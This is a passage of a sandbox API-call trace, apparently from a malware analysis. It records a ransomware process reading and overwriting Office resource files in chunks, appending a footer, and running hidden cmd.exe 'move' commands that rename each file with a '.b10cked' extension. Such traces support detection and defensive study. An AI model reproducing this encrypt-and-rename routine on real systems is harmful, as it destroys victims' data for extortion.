hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0171.974] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1a560 [0171.974] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0171.974] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x1a078 [0171.974] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0171.979] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0171.979] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0171.979] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x1a560 [0171.979] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0171.979] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0171.979] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0171.980] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, 
dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x1a560 [0171.980] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0171.980] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0171.980] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xd2af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xd2af, lpOverlapped=0x0) returned 1 [0172.043] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0172.043] WriteFile (in: hFile=0x114, lpBuffer=0x125a4a8*, nNumberOfBytesToWrite=0xd2af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x125a4a8*, lpNumberOfBytesWritten=0x12ec1c*=0xd2af, lpOverlapped=0x0) returned 1 [0172.044] SetFilePointer (in: hFile=0x114, lDistanceToMove=-53935, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xd2b1 [0172.044] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xd2af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xd2af, lpOverlapped=0x0) returned 1 [0172.045] SetFilePointer (in: hFile=0x114, lDistanceToMove=-53935, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xd2b1 [0172.045] WriteFile (in: hFile=0x114, lpBuffer=0x125a4a8*, nNumberOfBytesToWrite=0xd2af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x125a4a8*, lpNumberOfBytesWritten=0x12ec1c*=0xd2af, lpOverlapped=0x0) returned 1 [0172.051] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PUB6INTL.DLL.trx_dll", cchWideChar=20, 
lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0172.051] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PUB6INTL.DLL.trx_dll", cchWideChar=20, lpMultiByteStr=0x1328744, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PUB6INTL.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 20 [0172.051] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x1a560 [0172.051] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0172.051] CloseHandle (hObject=0x114) returned 1 [0172.052] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6IN~1.TRX") returned 0x3c [0172.053] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\") returned 0x30 [0172.054] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6IN~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6INTL.DLL.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, 
dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6IN~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6INTL.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0xa7c, dwThreadId=0x858)) returned 1 [0172.059] CloseHandle (hObject=0x1b4) returned 1 [0172.059] CloseHandle (hObject=0x114) returned 1 [0172.059] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0172.059] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0172.060] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount2=52) returned 2 [0172.060] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0172.060] ReleaseMutex (hMutex=0xf8) returned 1 [0172.060] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0172.060] ReleaseMutex (hMutex=0xf8) returned 1 [0172.060] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0172.060] ReleaseMutex (hMutex=0xf8) returned 1 [0172.060] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0172.060] ReleaseMutex (hMutex=0xf8) returned 1 [0172.060] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\pub6intl.rest.trx_dll"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0172.060] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.060] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x87f60 [0172.060] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.060] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=22884954659) returned 1 [0172.060] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.060] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x87f60 [0172.060] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.061] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.061] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x87f60 [0172.061] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.061] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.061] 
SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x87f60 [0172.061] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.061] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.061] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x87f60 [0172.061] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.061] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.061] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x87f60 [0172.061] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.061] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.061] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x87f60 [0172.061] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.061] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.061] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x87f60 [0172.062] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.062] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.062] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x87f60 [0172.062] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.062] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.062] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x87f60 [0172.062] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.062] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x87a78 [0172.062] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0172.131] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0172.131] SetFilePointer 
(in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0172.131] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x87f60 [0172.131] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0172.131] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0172.131] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0172.131] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x87f60 [0172.131] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0172.131] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0172.131] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0172.145] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0172.147] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, 
lpOverlapped=0x0) returned 1 [0172.148] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0172.148] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0172.149] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0172.149] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0172.149] SetFilePointer (in: hFile=0x114, lDistanceToMove=393216, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x60000 [0172.149] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0172.183] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0172.184] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0172.185] SetFilePointer (in: hFile=0x114, lDistanceToMove=393216, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x60000 [0172.185] WriteFile (in: hFile=0x114, 
lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0172.186] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0172.193] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0172.193] SetFilePointer (in: hFile=0x114, lDistanceToMove=-131072, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x67f60 [0172.193] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0172.193] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0172.193] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0172.194] SetFilePointer (in: hFile=0x114, lDistanceToMove=-131072, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x67f60 [0172.194] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0172.194] WriteFile (in: hFile=0x114, 
lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0172.194] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0172.198] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PUB6INTL.REST.trx_dll", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0172.198] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PUB6INTL.REST.trx_dll", cchWideChar=21, lpMultiByteStr=0x1328744, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PUB6INTL.REST.trx_dll", lpUsedDefaultChar=0x0) returned 21 [0172.198] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x87f60 [0172.198] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0172.198] CloseHandle (hObject=0x114) returned 1 [0172.202] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.REST.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6IN~2.TRX") returned 0x3c [0172.203] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\") returned 0x30 [0172.203] CreateProcessW (in: 
lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6IN~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6INTL.REST.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6IN~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6INTL.REST.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0x958, dwThreadId=0x2ac)) returned 1 [0172.208] CloseHandle (hObject=0x1b4) returned 1 [0172.208] CloseHandle (hObject=0x114) returned 1 [0172.208] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0172.208] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0172.208] CompareStringW (Locale=0x400, 